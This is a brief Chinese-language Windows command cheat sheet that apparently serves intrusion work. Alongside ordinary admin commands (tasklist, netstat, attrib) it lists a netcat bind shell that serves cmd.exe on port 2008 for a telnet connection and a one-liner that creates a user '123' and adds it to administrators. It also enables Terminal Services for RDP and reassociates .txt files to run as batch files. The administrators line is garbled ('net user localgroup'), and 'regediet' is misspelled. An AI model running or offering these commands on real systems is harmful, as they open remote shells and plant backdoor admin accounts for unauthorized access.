运行->mstsc 远程登陆
assoc .txt=batfile 将txt文件关联到cmd去
修改文件属性命令 attrib
net start “Terminal Services” 3389服务
nc.exe -l -p 2008 -t -e cmd.exe 再用 telnet IP 2008去连就可得一个CMDSHELL
net user 123 123 /add && net user localgroup administrators 123 /add
tasklist taskkill /f /im notepad.exe /f强制 /im后加映象名称
netstat -an 查看端口信息 net start 查看服务信息
regediet /s *.REG